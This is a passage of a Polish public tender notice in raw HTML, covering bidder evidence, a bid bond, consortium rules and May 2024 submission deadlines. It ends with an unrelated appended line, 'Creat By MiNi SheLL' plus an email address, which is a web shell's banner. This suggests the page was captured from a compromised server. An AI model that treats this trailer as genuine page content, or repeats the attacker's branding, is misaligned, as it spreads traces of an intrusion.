okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie. Wykaz należy sporządzić zgodnie ze wzorem określonym Formularzem DP.4.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>2. W zakresie warunku dot. zdolności technicznej w zakresie potencjału kadrowego: Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia (tj. wykaz osób i doświadczenia członków zespołu wykonawcy, którzy będą oddelegowani do realizacji zamówienia) w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz należy sporządzić zgodnie ze wzorem określonym Formularzem nr DP.5.<br/>II.<br/>1. W celu wstępnego potwierdzenia braku podstaw do wykluczenia oraz wstępnego potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca/ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia/Podmioty udostępniające zasoby składa wraz z ofertą oświadczenie z art. 125 ust. 1 Pzp, o którym mowa w Części II SWZ. Oświadczenie, to stanowi dowód tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe, potwierdzający na dzień składania ofert spełnianie warunków udziału w postępowaniu i brak podstaw do wykluczenia.<br/>2. Szczegółowe wymagania w zakresie formy dokumentu określonego w pkt. II ust. 1 i sposobu jego złożenia zostały określone w ust. 7 pkt. 7.1-7.7 Część I SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda, aby Wykonawca złożył wraz z ofertą przedmiotowe środki dowodowe <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę stanowi wypełniony formularz „Oferta” (Formularz OF.0.) oraz dokumenty wymienione w Warunkach szczególnych SWZ.<br/>Wraz z ofertą powinny być złożone:<br/>1. oświadczenia potwierdzające brak podstaw do wykluczenia oraz spełnianie warunków udziału w postępowaniu wymienione w ust. 3 pkt. 3.6. Część I SWZ i w zakresie wymaganym postanowieniami Części II (zgodnie z wzorem określonym w For. DP.1).<br/>2. oświadczenie, z którego wynika, które usługi, dostawy lub roboty bud. wykonają poszczególni Wykonawcy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący uprawnień (zgodnie z wz. określonym w Form. DP.2), jeżeli dotyczy zamówienia;<br/>3. oświadczenie, z którego wynika, które usługi i roboty budowlane wykonają poszczególni Wykonawcy w sytuacji gdy: Wykonawcy wspólnie ubiegający się o udzielenie zamówienia polegają na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane (zgodnie z wzorem określonym w Form. DP.2), jeżeli dotyczy zamówienia;<br/>4. pisemne zobowiązanie podmiotu udostępniającego zasoby, o którym mowa ust. 3 pkt. 3.4.4.-3.4.5. Część I SWZ, w przypadku, w którym Wykonawca polega na jego zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej, lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu;<br/>5. odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej RP lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. W przypadku wskazania przez Wykonawcę dostępności dokumentów, o których mowa w zdaniu pierwszym pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający żąda od Wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie przez Zamawiającego dokumentów jeśli dokumenty te będą sporządzone w języku innym niż język polski;<br/>6. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt. 6.12.5 SWZ Cz. I., Wykonawca składa pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy.<br/>7. pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewen. umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo;<br/>8. dowód wniesienia wadium (wnoszone w innej formie niż w pieniądzu)<br/>9. uzasadnienie tajemnicy przedsiębiorstwa, jeżeli Wykonawca zastrzega określone informacje składane wraz z ofertą jako tajemnica przedsiębiorstwa, stosownie do postanowień zawartych w ust. 6 pkt. 6.14. Część I SWZ; Wykonawca ma również obowiązek wykazać, że informacje oznaczone jako tajemnica przedsiębiorstwa stanowią tajemnicę jego przedsiębiorstwa. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga od Wykonawców wniesienia wadium w wysokości 5 000,00 zł: (słownie: pięć tysięcy złotych, 00/100);<br/>2. Wadium musi być wniesione przed upływem terminu do składania ofert. <br/>3. Pozostałe informacje dotyczące wniesienia wadium zostały określone w Części II SWZ lit. C <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> I. 1. Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia<br/>a) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (spółki cywilne, konsorcja) są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;<br/>b) Zamawiający nie wymaga od Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadania określonej formy prawnej w celu złożenia oferty;<br/>c) wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem;<br/>d) Zamawiający może określić szczególny, obiektywnie uzasadniony, sposób spełniania przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków udziału w postępowaniu, jeżeli jest to uzasadnione charakterem zamówienia i jest proporcjonalne. Szczegółowe informacje w tym zakresie opisane są w Części II SWZ.<br/><br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w części I SWZ pkt 3.6., składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcja, spółki cywilne), dokumenty wskazane w części II SWZ, lit. A, ust. 6 składa każdy z tych Wykonawców.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>4.1. warunki udziału w postępowaniu, o których mowa w części II SWZ lit. A ust. 1 zostaną spełnione jeżeli Wykonawcy wykażą, że łącznie spełniają te warunki: <br/>1) odnośnie do Wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać na zdolnościach tych z Wykonawców, którzy wykonają zamówienia, do realizacji których te zdolności są wymagane;<br/>2) jeżeli Wykonawca powołuje się na doświadczenie w ramach zamówień wykonywanych wspólnie z innymi Wykonawcami, warunek o którym mowa w ust. 1 pkt 1.4 , dotyczy zamówień, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy;<br/>3) w przypadku, gdy Wykonawca powołuje się na doświadczenie nabyte w ramach zamówienia zrealizowanego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca wykazywał doświadczenie grupy Wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał danego zakresu czynności;<br/>4) Zamawiający zastrzega sobie możliwość zwrócenia się do Wykonawcy o udzielenie wyjaśnień odnośnie zakresu faktycznie i konkretnie zrealizowanego w ramach czynności oraz przedstawienia stosownych dowodów, np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur.<br/>4.2.W celu potwierdzenia, które zamówienia wykonają poszczególni Wykonawcy wspólnie ubiegający się o udzielenie zamówienia do oferty należy załączyć oświadczenie, z którego wynika, które elementy zamówienia wykonają poszczególni Wykonawcy (zgodnie z wzorem określonym w Formularzu DP.2), jeżeli dotyczy zamówienia.<br/>II. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca może polegać na potencjale podmiotu udostępniającego zasoby na zasadach opisanych w art. 118–123 ustawy Pzp. Podmiot trzeci, na potencjał którego Wykonawca powołuje się w celu wykazania spełnienia warunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp oraz na podstawie art. 7 ust. 1 UPWAU. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zamawiający przewidział możliwość dokonania zmian umowy oraz warunków ich wprowadzenia w Projektowanych Postanowieniach Umowy stanowiących Część IV SWZ.<br/>2. Zamawiający będzie zobowiązany do wykorzystania co najmniej 1000 roboczogodzin w ramach niniejszego zamówienia<br/>3. Zamawiający dopuszcza udział podwykonawców przy realizacji zamówienia.<br/>3.1. W przypadku udziału podwykonawców przy realizacji zamówienia Zamawiający, zgodnie z art. 462 ust. 2 ustawy Pzp,<br/>żąda wskazania przez Wykonawcę części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, i podania<br/>przez Wykonawcę nazw firm podwykonawców (o ile są znane).<br/>3.2. Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności za należyte<br/>wykonanie zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy Zakupowej pod adresem https://przetargi-gitd.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-31 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu, za wyjątkiem zaistnienia sytuacji, o której mowa w art. 261 ustawy Pzp.<br/>2. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań.<br/>3. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań.<br/>4. Zamawiający nie określa wymogu zatrudniania przez wykonawcę lub podwykonawcę osób na podstawie umowy o pracę z uwagi, na fakt iż czynności wskazane do realizacji w ramach zamówienia publicznego nie polegają na świadczeniu pracy w rozumieniu art. 22 § 1 Kodeksu pracy.<br/>5. Zamawiający nie stawia wymogu w zakresie zatrudnienia przez Wykonawcę osób, o których mowa w art. 96 ust. 2 pkt 2) ustawy Pzp.<br/>6. Zamawiający nie zastrzega wymogów ani wymagań związanych z realizacją zamówienia, o których mowa w przepisie 96 ust. 1 ustawy Pzp<br/>7. Zamówienie może zostać udzielone Wykonawcy, który:<br/>a) nie podlega wykluczeniu z postępowania na podstawie obligatoryjnych przepisów z art. 108 ust. 1 ustawy Pzp; UWAGA! w związku z ograniczoną liczbę znaków w przedmiotowym formularzu - Ogłoszenia o zamówieniu - brak możliwości przytoczenia pełnego brzmienia wskazanych wyżej podstaw wykluczania. Pełne brzmienie podstaw wykluczenia wskazano w Cz. I SWZ.<br/>b) nie podlega wykluczeniu z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2024 r. poz. 507).) <br/>c) spełnia warunki udziału w postępowaniu opisane w Części II SWZ;<br/>d) złożył ofertę niepodlegającą odrzuceniu na podstawie art. 226 ust. 1 ustawy Pzp.<br/>8. Jako dopuszczalne określa formaty danych zgodne z Rozporządzeniem Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tj. Dz. U. z 2017 r. poz. 2247) (dalej również jako „KRI”) o wielkości do 100 MB. Jednocześnie Zamawiający zaleca/rekomenduje stosowanie w szczególności następujących formatów danych, dokumentów i oświadczeń: .pdf, .doc, .docx. Za pośrednictwem Platformy można przesyłać wiele pojedynczych plików każdy w jednym ze wskazanych w KRI formatów, lub plik archiwum (ZIP) zawierający wiele pojedynczych plików w dowolnym akceptowalnym formacie. W przypadku, gdy plik sporządzony w jednym z formatów<br/>opisanych w KRI nie jest wskazany na liście plików obsługiwanych przez Platformę, wystarczy go zapisać w folderze archiwum ZIP.<br/>9 .Dopuszcza się posługiwanie się podpisem: kwalifikowanym, osobistym, bądź zaufanym.<br/>10. Zamawiający rekomenduje używanie znacznika czasu.<br/>11.Zamawiający nie przewiduje:<br/>a) przeprowadzenia zebrania przedofertowego z Wykonawcami;<br/>b) możliwości udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 Pzp.<br/>12. Wykonawca jest zobowiązany do wniesienia zabezpieczenia należytego wykonania umowy na kwotę stanowiącą: 5% ceny całkowitej podanej w ofercie zgodnie z art. 452 ust. 2 ustawy Pzp.<br/>13.Zamawiający nie przewiduje, że unieważni postępowanie w przypadkach określonych w art. 310 ustawy Pzp, jeżeli środki publiczne, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.<br/>14. Zamawiający nie przewiduje obowiązku przeprowadzenia przez Wykonawcę wizji lokalnej oraz sprawdzenia przez Wykonawcę dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u Zamawiającego.<br/>15. Niniejsze zamówienie jest zamówieniem udzielanym w częściach, z których każda stanowi przedmiot odrębnego postępowania.

Creat By MiNi SheLL
Email: jattceo@gmail.com